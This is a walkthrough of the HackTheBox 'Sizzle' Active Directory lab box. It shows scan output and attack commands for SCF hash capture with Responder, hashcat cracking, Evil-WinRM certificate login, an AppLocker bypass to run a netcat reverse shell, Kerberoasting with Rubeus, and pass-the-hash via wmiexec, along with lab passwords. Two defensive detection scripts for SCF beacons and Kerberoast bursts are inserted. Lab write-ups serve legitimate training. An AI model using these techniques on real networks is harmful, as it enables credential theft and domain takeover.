This is my writeup for HackTheBox's box Sizzle, a really good and challenging box that requires you to exploit an Active Directory server. The box starts with exploiting Samba via an SCF file attack, which, combined with Evil-WinRM, gives us our first foothold. After that we Kerberoast the server to get user.txt, then obtain the NTLM hash for Administrator and log in via wmiexec.py.
Reconnaissance
I use a tool called nmapAutomator, which I can recommend; alternatively you can also use AutoRecon.
```
# Nmap 7.80 scan initiated Mon Sep 7 19:36:12 2020 as: nmap -Pn -sCV -p21,53,80,135,139,389,443,445,464,593,636,3268,3269 -oN nmap/Basic_10.10.10.103.nmap 10.10.10.103
Nmap scan report for sizzle (10.10.10.103)
Host is up (0.078s latency).

PORT     STATE SERVICE      VERSION
21/tcp   open  ftp          Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_  SYST: Windows_NT
53/tcp   open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
80/tcp   open  http         Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
|_ssl-date: 2020-09-07T14:09:18+00:00; 0s from scanner time.
443/tcp  open  ssl/http     Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
|_ssl-date: 2020-09-07T14:09:18+00:00; 0s from scanner time.
| tls-alpn:
|   h2
|_  http/1.1
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap     Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
|_ssl-date: 2020-09-07T14:09:18+00:00; 0s from scanner time.
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
|_ssl-date: 2020-09-07T14:09:18+00:00; 0s from scanner time.
3269/tcp open  ssl/ldap     Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
|_ssl-date: 2020-09-07T14:09:18+00:00; 0s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=9/7%Time=5F563E61%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```
```
# Nmap 7.80 scan initiated Mon Sep 7 20:05:25 2020 as: nmap -Pn -sCV -p5985,5986,9389,47001,49664,49665,49668,49669,49677,49686,49687,49690,49693,49705,49722,49741 -oN nmap/Full_10.10.10.103.nmap 10.10.10.103
Nmap scan report for sizzle (10.10.10.103)
Host is up (0.086s latency).

PORT      STATE SERVICE    VERSION
5985/tcp  open  http       Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp  open  ssl/http   Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2018-07-02T20:26:23
|_Not valid after:  2019-07-02T20:26:23
|_ssl-date: 2020-09-07T14:36:39+00:00; 0s from scanner time.
| tls-alpn:
|   h2
|_  http/1.1
9389/tcp  open  mc-nmf     .NET Message Framing
47001/tcp open  http       Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc      Microsoft Windows RPC
49665/tcp open  msrpc      Microsoft Windows RPC
49668/tcp open  msrpc      Microsoft Windows RPC
49669/tcp open  msrpc      Microsoft Windows RPC
49677/tcp open  msrpc      Microsoft Windows RPC
49686/tcp open  ncacn_http Microsoft Windows RPC over HTTP 1.0
49687/tcp open  msrpc      Microsoft Windows RPC
49690/tcp open  msrpc      Microsoft Windows RPC
49693/tcp open  unknown
49705/tcp open  msrpc      Microsoft Windows RPC
49722/tcp open  msrpc      Microsoft Windows RPC
49741/tcp open  msrpc      Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep 7 20:06:39 2020 -- 1 IP address (1 host up) scanned in 73.91 seconds
```
```
PORT      STATE SERVICE VERSION
53/udp    open  domain  (generic dns response: SERVFAIL)
| fingerprint-strings:
|   NBTStat:
|_    CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
123/udp   open  ntp     NTP v3
61685/udp open  domain  (generic dns response: SERVFAIL)
| fingerprint-strings:
|   NBTStat:
|_    CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
61961/udp open  domain  (generic dns response: SERVFAIL)
| fingerprint-strings:
|   NBTStat:
|_    CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
62699/udp open  domain  (generic dns response: SERVFAIL)
| fingerprint-strings:
|   NBTStat:
|_    CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
62958/udp open  domain  (generic dns response: SERVFAIL)
| fingerprint-strings:
|   NBTStat:
|_    CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
5 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port53-UDP:V=7.80%I=7%D=9/7%Time=5F564421%P=x86_64-pc-linux-gnu%r(NBTSt
SF:at,32,"\x80\xf0\x80\x82\0\x01\0\0\0\0\0\0\x20CKAAAAAAAAAAAAAAAAAAAAAAAA
SF:AAAAAA\0\0!\0\x01");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port61685-UDP:V=7.80%I=7%D=9/7%Time=5F564421%P=x86_64-pc-linux-gnu%r(NB
SF:TStat,32,"\x80\xf0\x80\x82\0\x01\0\0\0\0\0\0\x20CKAAAAAAAAAAAAAAAAAAAAA
SF:AAAAAAAAA\0\0!\0\x01");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port61961-UDP:V=7.80%I=7%D=9/7%Time=5F564421%P=x86_64-pc-linux-gnu%r(NB
SF:TStat,32,"\x80\xf0\x80\x82\0\x01\0\0\0\0\0\0\x20CKAAAAAAAAAAAAAAAAAAAAA
SF:AAAAAAAAA\0\0!\0\x01");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port62699-UDP:V=7.80%I=7%D=9/7%Time=5F564421%P=x86_64-pc-linux-gnu%r(NB
SF:TStat,32,"\x80\xf0\x80\x82\0\x01\0\0\0\0\0\0\x20CKAAAAAAAAAAAAAAAAAAAAA
SF:AAAAAAAAA\0\0!\0\x01");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port62958-UDP:V=7.80%I=7%D=9/7%Time=5F564421%P=x86_64-pc-linux-gnu%r(NB
SF:TStat,32,"\x80\xf0\x80\x82\0\x01\0\0\0\0\0\0\x20CKAAAAAAAAAAAAAAAAAAAAA
SF:AAAAAAAAA\0\0!\0\x01");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep 7 20:01:02 2020 -- 1 IP address (1 host up) scanned in 27.42 seconds
```
This box had many services running, and looking at the type of services my first hunch was that this is an Active Directory server, but the missing port 88 (Kerberos) was odd to me. After getting some idea about the machine I started enumerating the box.
Enumeration
HTTP / HTTPS Enumeration
When I visited https://sizzle.htb.local I was greeted with a GIF. I ran gobuster against both HTTP and HTTPS in the background and carried on with my enumeration. I downloaded the GIF and used exiftool on it to check for metadata.
Gobuster
Gobuster returned results for the following command:

```
gobuster-old -t 40 -u http://10.10.10.103 -x aspx,php -e -w $WORDLIST_COMMON -s 200,204,301,302,307,401
```
Visiting http://10.10.10.103/certsrv asked for credentials, so I moved on to the next service, SMB, in the hope of finding some credentials to log in with.
SMB
I then tried to access the SMB shares anonymously and the server replied.

Directories like CertEnroll, Department Shares and Operations looked interesting; some of them relate to the directories we saw during HTTP enumeration. To enumerate further I mounted the share on /mnt, after which enumerating became a tad easier:

```
sudo mount -t cifs "//10.10.10.103/Department Shares" /mnt
```

I downloaded all the files from ZZ_ARCHIVE. Comparing the hashes of all the files made it clear they were all identical and empty.

Further file enumeration led us to the Users directory, which contained many potential usernames. We write them to a file called usernames in case we need to brute-force a login later.

I then started looking at the file permissions of the directories and found that Public is writable. Since we can upload files to the share, we can exploit this with an SCF file attack: we upload a Shell Command File whose IconFile points at our host, so that the box requests the resource from us, at which point we can capture the NTLM hash of whoever browses the share.
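The flip side of the writable Public share is that a defender can catch this by looking for SCF files whose IconFile points at a foreign host. The following is an added example, not code from the writeup: it walks an exported share directory and flags .scf files whose IconFile is a UNC path to a host outside an allowlist. The share contents and the host name EXAMPLE-UNTRUSTED are constructed.

```python
"""Flag SCF files on a share whose IconFile points at an untrusted UNC host.
Sample share contents below are constructed for this example."""
import configparser
import os
import re
import tempfile

# \\host\share\... : capture the host part of a UNC path
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")


def icon_file_from_scf(text):
    """Return the IconFile value from an SCF's [Shell] section, or None."""
    cp = configparser.ConfigParser(interpolation=None)
    try:
        cp.read_string(text)
    except configparser.Error:
        return None
    return cp.get("Shell", "IconFile", fallback=None)


def unc_host(path):
    """Lower-cased host of a UNC path, or None for local/env-var paths."""
    m = UNC_RE.match(path or "")
    return m.group(1).lower() if m else None


def find_scf_beacons(root, trusted_hosts=()):
    """Walk root; return [(relative_path, host)] for .scf files whose
    IconFile is a UNC path to a host not in trusted_hosts."""
    trusted = {h.lower() for h in trusted_hosts}
    hits = []
    for d, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".scf"):
                continue
            full = os.path.join(d, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                host = unc_host(icon_file_from_scf(fh.read()))
            if host and host not in trusted:
                hits.append((os.path.relpath(full, root), host))
    return hits


# Constructed samples: a normal Show Desktop SCF and one that beacons out.
BENIGN = "[Shell]\nCommand=2\nIconFile=%SystemRoot%\\system32\\SHELL32.dll,3\n[Taskbar]\nCommand=ToggleDesktop\n"
SUSPECT = "[Shell]\nCommand=2\nIconFile=\\\\EXAMPLE-UNTRUSTED\\icons\\x.ico\n"


def demo():
    """Build a throwaway share export and scan it."""
    with tempfile.TemporaryDirectory() as share:
        os.makedirs(os.path.join(share, "Public"))
        with open(os.path.join(share, "Public", "desktop.scf"), "w") as f:
            f.write(BENIGN)
        with open(os.path.join(share, "Public", "readme.scf"), "w") as f:
            f.write(SUSPECT)
        return find_scf_beacons(share, trusted_hosts=["sizzle.htb.local"])
```

Run over a real export of "Department Shares", the same function reports every SCF that would make a browsing user authenticate to an outside host.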
Listening for NTLM hashes

```
responder -I tun0
```
We can now crack Amanda's NetNTLMv2 hash with hashcat:

```
hashcat -m 5600 hash.amanda /home/alpha/wordlist/rockyou.txt -O
```
LDAP
Using the obtained credentials I checked whether LDAP could give us some more details about the machine. I used this to enumerate LDAP.
```
DSA info (from DSE):
  Supported LDAP versions: 3, 2
  Naming contexts:
    DC=HTB,DC=LOCAL
    CN=Configuration,DC=HTB,DC=LOCAL
    CN=Schema,CN=Configuration,DC=HTB,DC=LOCAL
    DC=DomainDnsZones,DC=HTB,DC=LOCAL
    DC=ForestDnsZones,DC=HTB,DC=LOCAL
  Supported controls:
    1.2.840.113556.1.4.1338 - Verify name - Control - MICROSOFT
    1.2.840.113556.1.4.1339 - Domain scope - Control - MICROSOFT
    1.2.840.113556.1.4.1340 - Search options - Control - MICROSOFT
    1.2.840.113556.1.4.1341 - RODC DCPROMO - Control - MICROSOFT
    1.2.840.113556.1.4.1413 - Permissive modify - Control - MICROSOFT
    1.2.840.113556.1.4.1504 - Attribute scoped query - Control - MICROSOFT
    1.2.840.113556.1.4.1852 - User quota - Control - MICROSOFT
    1.2.840.113556.1.4.1907 - Server shutdown notify - Control - MICROSOFT
    1.2.840.113556.1.4.1948 - Range retrieval no error - Control - MICROSOFT
    1.2.840.113556.1.4.1974 - Server force update - Control - MICROSOFT
    1.2.840.113556.1.4.2026 - Input DN - Control - MICROSOFT
    1.2.840.113556.1.4.2064 - Show recycled - Control - MICROSOFT
    1.2.840.113556.1.4.2065 - Show deactivated link - Control - MICROSOFT
    1.2.840.113556.1.4.2066 - Policy hints [DEPRECATED] - Control - MICROSOFT
    1.2.840.113556.1.4.2090 - DirSync EX - Control - MICROSOFT
    1.2.840.113556.1.4.2204 - Tree deleted EX - Control - MICROSOFT
    1.2.840.113556.1.4.2205 - Updates stats - Control - MICROSOFT
    1.2.840.113556.1.4.2206 - Search hints - Control - MICROSOFT
    1.2.840.113556.1.4.2211 - Expected entry count - Control - MICROSOFT
    1.2.840.113556.1.4.2239 - Policy hints - Control - MICROSOFT
    1.2.840.113556.1.4.2255 - Set owner - Control - MICROSOFT
    1.2.840.113556.1.4.2256 - Bypass quota - Control - MICROSOFT
    1.2.840.113556.1.4.2309
    1.2.840.113556.1.4.319 - LDAP Simple Paged Results - Control - RFC2696
    1.2.840.113556.1.4.417 - LDAP server show deleted objects - Control - MICROSOFT
    1.2.840.113556.1.4.473 - Sort Request - Control - RFC2891
    1.2.840.113556.1.4.474 - Sort Response - Control - RFC2891
    1.2.840.113556.1.4.521 - Cross-domain move - Control - MICROSOFT
    1.2.840.113556.1.4.528 - Server search notification - Control - MICROSOFT
    1.2.840.113556.1.4.529 - Extended DN - Control - MICROSOFT
    1.2.840.113556.1.4.619 - Lazy commit - Control - MICROSOFT
    1.2.840.113556.1.4.801 - Security descriptor flags - Control - MICROSOFT
    1.2.840.113556.1.4.802 - Range option - Control - MICROSOFT
    1.2.840.113556.1.4.805 - Tree delete - Control - MICROSOFT
    1.2.840.113556.1.4.841 - Directory synchronization - Control - MICROSOFT
    1.2.840.113556.1.4.970 - Get stats - Control - MICROSOFT
    2.16.840.1.113730.3.4.10 - Virtual List View Response - Control - IETF
    2.16.840.1.113730.3.4.9 - Virtual List View Request - Control - IETF
  Supported extensions:
    1.2.840.113556.1.4.1781 - Fast concurrent bind - Extension - MICROSOFT
    1.2.840.113556.1.4.2212 - Batch request - Extension - MICROSOFT
    1.3.6.1.4.1.1466.101.119.1 - Dynamic Refresh - Extension - RFC2589
    1.3.6.1.4.1.1466.20037 - StartTLS - Extension - RFC4511-RFC4513
    1.3.6.1.4.1.4203.1.11.3 - Who am I - Extension - RFC4532
  Supported features:
    1.2.840.113556.1.4.1670 - Active directory V51 - Feature - MICROSOFT
    1.2.840.113556.1.4.1791 - Active directory LDAP Integration - Feature - MICROSOFT
    1.2.840.113556.1.4.1935 - Active directory V60 - Feature - MICROSOFT
    1.2.840.113556.1.4.2080 - Active directory V61 R2 - Feature - MICROSOFT
    1.2.840.113556.1.4.2237 - Active directory W8 - Feature - MICROSOFT
    1.2.840.113556.1.4.800 - Active directory - Feature - MICROSOFT
  Supported SASL mechanisms: GSSAPI, GSS-SPNEGO, EXTERNAL, DIGEST-MD5
  Schema entry: CN=Aggregate,CN=Schema,CN=Configuration,DC=HTB,DC=LOCAL
Other:
  currentTime: 20200907163653.0Z
  dsServiceName: CN=NTDS Settings,CN=SIZZLE,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=HTB,DC=LOCAL
  defaultNamingContext: DC=HTB,DC=LOCAL
  schemaNamingContext: CN=Schema,CN=Configuration,DC=HTB,DC=LOCAL
  configurationNamingContext: CN=Configuration,DC=HTB,DC=LOCAL
  rootDomainNamingContext: DC=HTB,DC=LOCAL
  supportedLDAPPolicies:
    MaxPoolThreads
    MaxPercentDirSyncRequests
    MaxDatagramRecv
    MaxReceiveBuffer
    InitRecvTimeout
    MaxConnections
    MaxConnIdleTime
    MaxPageSize
    MaxBatchReturnMessages
    MaxQueryDuration
    MaxDirSyncDuration
    MaxTempTableSize
    MaxResultSetSize
    MinResultSets
    MaxResultSetsPerConn
    MaxNotificationPerConn
    MaxValRange
    MaxValRangeTransitive
    ThreadMemoryLimit
    SystemMemoryLimitPercent
  highestCommittedUSN: 118875
  dnsHostName: sizzle.HTB.LOCAL
  ldapServiceName: HTB.LOCAL:[email protected]
  serverName: CN=SIZZLE,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=HTB,DC=LOCAL
  isSynchronized: TRUE
  isGlobalCatalogReady: TRUE
  domainFunctionality: 7
  forestFunctionality: 7
  domainControllerFunctionality: 7
```
Once I had credentials I also used them to enumerate the service again with ldapsearch and with this, which gave us the users and their associated certificates. Moving on.

```
ldapsearch -x -h sizzle.htb.local -D '[email protected]' -w 'Ashare1972' -b 'dc=htb,dc=local'
```
Exploitation
Generating Certificate
After cracking Amanda's password I tried to log in to the certificate authority with the freshly obtained credentials, but the machine took an eternity to load the page. Anyhow, after it loaded I saw the page below:

Given this, I generated a key for Amanda with `openssl genrsa -aes256 -out amanda.key 2048`, followed by a certificate signing request with `openssl req -new -key amanda.key -out amanda.csr`. This article might prove useful. After this, go to the HTTP server and click Request a certificate > Advanced Certificate Request, paste the contents of the CSR into the Saved Request field and click Submit.
Evil-WinRM
Now, with the help of Evil-WinRM and the certificate, we can get a shell. We modified the Evil-WinRM script a little to suit us:

```ruby
# Modified interactive loop from Evil-WinRM. `conn` is the WinRM::Connection
# (winrm gem) that the script opens earlier with the certificate and key;
# `$id` is assumed to be a PowerShell variable set on the remote side before
# this loop runs, and is only used to build the prompt.
command = ""
conn.shell(:powershell) do |shell|
  until command == "exit\n" do
    # Build the prompt remotely: <id>PS user@host cwd>
    output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
    print(output.output.chomp)
    command = gets
    # Run the typed command and stream its stdout/stderr as it arrives
    output = shell.run(command) do |stdout, stderr|
      STDOUT.print stdout
      STDERR.print stderr
    end
  end
  puts "Exiting with code #{output.exitcode}"
end
```
This lands us a shell. We then transfer nc.exe to the remote machine with Invoke-WebRequest. This machine was very hardened and it was difficult to transfer files between the remote box and mine. Anyhow, once I had transferred nc.exe, Group Policy stopped me from running it to get a reverse shell. Upon some research I came across the repository UltimateAppLockerByPassList; this page in particular was interesting. Once I copied nc.exe to C:\Windows\Temp, it ran and gave me back a PowerShell reverse shell.
Privilege Escalation
Escalating to mrlky
Upon enumerating the network from the shell I found port 88 listening, which wasn't visible in our nmap scans. To Kerberoast I chose Rubeus, because then I wouldn't have to port forward. I switched to my Windows 10 VM and compiled Rubeus with Visual Studio; you can find a compiled version of the binary here.

I then transferred the binary to the machine at C:\Windows\Temp\. Issuing the following (to escalate to another user) gave the NTLM hash for a user called mrlky:

```
.\rub.exe kerberoast /creduser:htb.local\amanda /credpassword:Ashare1972
```

Cracking this hash with hashcat gives us the password Football#7.
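From the blue-team side, the Rubeus run above leaves a trail in the domain controller's Security log: one Event ID 4769 (TGS request) per SPN, and Kerberoasting tools normally ask for RC4 (etype 0x17) tickets because those crack fastest. This added example (not from the writeup) flags accounts that pull several successful RC4 service tickets for distinct, non-krbtgt services inside a short window; the 4769 records are constructed, with amanda requesting the mrlky SPN as in the box.

```python
"""Detect Kerberoast-style bursts in constructed 4769 records."""
from collections import defaultdict

RC4_HMAC = 0x17  # Ticket Encryption Type that Kerberoast tools prefer

# Constructed 4769 events: (timestamp_seconds, account, service, etype, status)
EVENTS = [
    (0,  "amanda@HTB.LOCAL", "krbtgt",     0x12, "0x0"),  # normal AES TGS
    (5,  "amanda@HTB.LOCAL", "mrlky",      RC4_HMAC, "0x0"),  # RC4 for a user SPN
    (6,  "amanda@HTB.LOCAL", "svc_sql",    RC4_HMAC, "0x0"),
    (7,  "amanda@HTB.LOCAL", "svc_backup", RC4_HMAC, "0x0"),
    (40, "mrlky@HTB.LOCAL",  "krbtgt",     0x12, "0x0"),
    (41, "mrlky@HTB.LOCAL",  "SIZZLE$",    0x12, "0x0"),
]


def kerberoast_alerts(events, window=60, min_rc4=3):
    """Return {account: sorted distinct services} for every account that
    obtained >= min_rc4 successful RC4 tickets for distinct, non-krbtgt
    services within any sliding window of `window` seconds."""
    per_acct = defaultdict(list)
    for ts, acct, svc, etype, status in sorted(events):
        if etype == RC4_HMAC and status == "0x0" and svc.lower() != "krbtgt":
            per_acct[acct].append((ts, svc))
    alerts = {}
    for acct, reqs in per_acct.items():
        for i, (start, _) in enumerate(reqs):
            svcs = {s for t, s in reqs[i:] if t - start <= window}
            if len(svcs) >= min_rc4:
                alerts[acct] = sorted(svcs)
                break
    return alerts


if __name__ == "__main__":
    for acct, svcs in kerberoast_alerts(EVENTS).items():
        print(f"possible Kerberoast by {acct}: RC4 tickets for {', '.join(svcs)}")
```

The same logic works on exported 4769 fields (TargetUserName, ServiceName, TicketEncryptionType, Status); raising the window or lowering the threshold trades false positives for sensitivity.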
Escalating to Administrator
With the freshly obtained credentials for mrlky we can try to dump the NTLM hashes of all users using secretsdump.py.

Since we now have the NTLM hash of Administrator, we can use it to get command execution on the machine with wmiexec.py:

```
wmiexec.py -hashes xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx [email protected]
```

I used this shell to get myself another PowerShell reverse shell.
Proof
```
echo "whoami"; whoami; echo "ifconfig"; ipconfig; echo "hostname"; hostname; echo "root.txt"; more C:\Users\Administrator\Desktop\root.txt; echo "user.txt"; more C:\Users\mrlky\Desktop\user.txt
```